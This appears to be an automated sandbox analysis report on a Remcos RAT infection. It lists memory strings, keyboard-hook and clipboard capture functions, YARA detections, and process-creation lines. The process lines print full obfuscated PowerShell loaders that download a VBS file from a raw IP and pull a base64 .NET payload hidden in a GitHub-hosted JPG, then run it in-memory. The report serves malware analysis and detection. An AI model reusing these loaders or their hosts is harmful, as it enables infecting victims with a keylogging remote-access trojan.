                      Source: powershell.exe, 00000001.00000002.2119899349.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2060949985.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2354881684.0000000005208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2354881684.00000000051F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.00000000044B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2279258248.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000001.00000002.2119899349.00000000056A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.0000000004D36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: RegAsm.exe, 0000000C.00000002.2252150861.000000000111A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: RegAsm.exe, 0000000C.00000002.2252150861.000000000111A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: RegAsm.exe, 0000000C.00000002.2252150861.000000000111A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: RegAsm.exe, 0000000C.00000002.2252150861.000000000111A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauthp
                      Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                      Source: powershell.exe, 00000001.00000002.2132026884.0000000006008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2063385323.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                      Source: powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg
                      Source: powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgt
                      Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49707 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000011_2_0040A2F3
                      Installs a global keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040B749
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_004168FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_0040987A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004098E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_00406E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004072B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040B749
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,11_2_0040A41B
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4474275239.0000000002D4E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Contains functionalty to change the wallpaper
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CA73 SystemParametersInfoW,11_2_0041CA73

                      System Summary

                      barindex
                      Detected Cobalt Strike Beacon
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXeJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"Jump to behavior
                      Malicious sample detected (through community Yara rule)
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
